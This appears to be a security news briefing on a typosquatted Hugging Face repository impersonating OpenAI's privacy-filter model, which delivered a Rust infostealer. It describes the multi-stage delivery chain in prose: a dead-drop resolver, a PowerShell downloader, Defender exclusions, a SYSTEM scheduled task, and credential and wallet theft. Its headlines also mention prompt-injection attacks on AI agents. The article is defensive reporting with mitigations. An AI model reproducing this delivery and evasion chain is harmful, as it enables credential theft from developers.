LIVE THREATS
CRITICAL Typosquatted OpenAI Repo on Hugging Face Delivered Rust Infostealer to 244K Users // HIGH Fake OpenAI Repository on Hugging Face Delivers Rust-Based Infostealer // HIGH ClaudeBleed Flaw Lets Rogue Chrome Extensions Hijack AI Agent // HIGH Claude Mythos AI-Assisted Fuzzing Uncovers 423 Firefox Security Bugs in One Month // HIGH Fake Claude AI Site Used to Distribute Beagle Backdoor and PlugX Malware // HIGH Malicious Repos Trigger Silent Code Execution in Claude, Cursor, Gemini CLIs // HIGH Mitiga Labs: MCP Hijack Attack Steals Claude Code OAuth Tokens via Silent … // HIGH Pixel-Level Perturbations Enable Invisible Prompt Injection in Vision-Language Models // CRITICAL Prompt Injection Achieves Remote Code Execution in Semantic Kernel Agent Framework // HIGH Unmanaged AI Agents Expose Enterprise Identity Perimeters to Silent Compromise //
ATLAS OWASP CRITICAL Active exploitation · Immediate action required RELEVANCE ▲ 8.5

Typosquatted OpenAI Repo on Hugging Face Delivered Rust Infostealer to 244K Users

TL;DR CRITICAL
  • What happened: Fake OpenAI model repo on Hugging Face delivered a Rust infostealer to 244,000 downloaders.
  • Who's at risk: AI/ML practitioners and developers who downloaded or executed the typosquatted Open-OSS/privacy-filter repository on Windows machines are directly exposed.
  • Act now: Audit any usage of Open-OSS/privacy-filter and treat affected systems as fully compromised · Verify Hugging Face repository provenance by checking namespace and commit history before execution · Rotate browser credentials, cryptocurrency wallet keys, and Discord tokens on any affected machine
Typosquatted OpenAI Repo on Hugging Face Delivered Rust Infostealer to 244K Users

Overview

A threat actor successfully typosquatted OpenAI’s legitimate openai/privacy-filter model on Hugging Face, publishing a near-identical repository under the namespace Open-OSS/privacy-filter. The malicious project copied the official model card verbatim, rode the legitimate product’s launch momentum, and reached the platform’s trending list — accumulating 244,000 downloads before Hugging Face disabled access. Privacy Filter is an OpenAI open-weight model released in April 2026 to detect and redact PII from unstructured text, making it a high-value impersonation target for developers integrating privacy tooling into production pipelines.

Technical Analysis

The attack chain is multi-stage and deliberately obfuscated:

  1. Initial Execution: Users are instructed to clone the repository and run start.bat (Windows) or loader.py (Linux/macOS). On Windows, loader.py disables SSL verification, decodes a Base64-encoded URL stored on JSON Keeper (a public JSON paste service used as a dead-drop resolver), and retrieves a PowerShell command.

  2. Dead-Drop Resolver: Using JSON Keeper decouples the payload URL from the repository, allowing operators to hot-swap malware without touching the repo — evading static repository scanning.

  3. Second-Stage Downloader: PowerShell downloads a batch script from api.eth-fastscan[.]org, which:

    • Elevates privileges via a UAC prompt
    • Configures Microsoft Defender exclusions
    • Downloads the next-stage binary from the same domain
    • Establishes a scheduled task to launch a PowerShell-executed binary as SYSTEM
  4. Infostealer Payload (Rust-based):

    • Captures screenshots
    • Harvests credentials from Chromium and Gecko browsers
    • Exfiltrates Discord tokens, cryptocurrency wallet data and extensions, FileZilla configs, and wallet seed phrases
    • Checks for debuggers, sandboxes, and virtual machines
    • Disables AMSI and ETW to evade behavioural detection
    • Operates as a one-shot SYSTEM-context launcher; the scheduled task self-destructs before reboot, leaving no persistence artefact

The ephemeral persistence model suggests the operators prioritise stealth and rapid exfiltration over long-term access.

Framework Mapping

  • AML.T0010 – ML Supply Chain Compromise: The attack directly targets the ML model distribution pipeline via a trojanised repository on a major model-sharing platform.
  • AML.T0019 – Publish Poisoned Datasets/Models: The repository mimics a legitimate model release to introduce malicious code into the consumer’s environment.
  • LLM05 – Supply Chain Vulnerabilities: Hugging Face serves as the distribution vector; the attack exploits weak namespace governance and trending mechanics to amplify reach.

Impact Assessment

With 244,000 downloads, the potential victim pool is large and skewed toward security-conscious developers — precisely those who would adopt a PII-filtering tool. Compromised assets include browser-stored credentials, cryptocurrency holdings, and Discord accounts. The SYSTEM-level execution context means any machine that ran the payload should be considered fully compromised. The self-deleting task complicates forensic investigation, as traditional persistence indicators will be absent.

Mitigation & Recommendations

  • Immediate: Treat any system that executed Open-OSS/privacy-filter artefacts as compromised. Isolate, image, and rebuild.
  • Credential Rotation: Rotate all browser-stored passwords, cryptocurrency wallet keys, and Discord tokens from affected machines.
  • Repository Vetting: Before cloning any Hugging Face repository, verify the exact namespace matches the official vendor account. Check model card edit history for anomalies.
  • Execution Policy: Never run batch or Python setup scripts from model repositories without code review, particularly those requesting elevated privileges.
  • Platform Controls: Organisations should implement allowlists for approved Hugging Face namespaces in CI/CD pipelines and restrict unapproved model downloads in developer environments.

References

◉ AI THREAT BRIEFING

Stay ahead of the threat.

Twice-weekly digest of critical AI security developments — every story mapped to MITRE ATLAS and OWASP LLM Top 10. Free.

No spam. Unsubscribe anytime.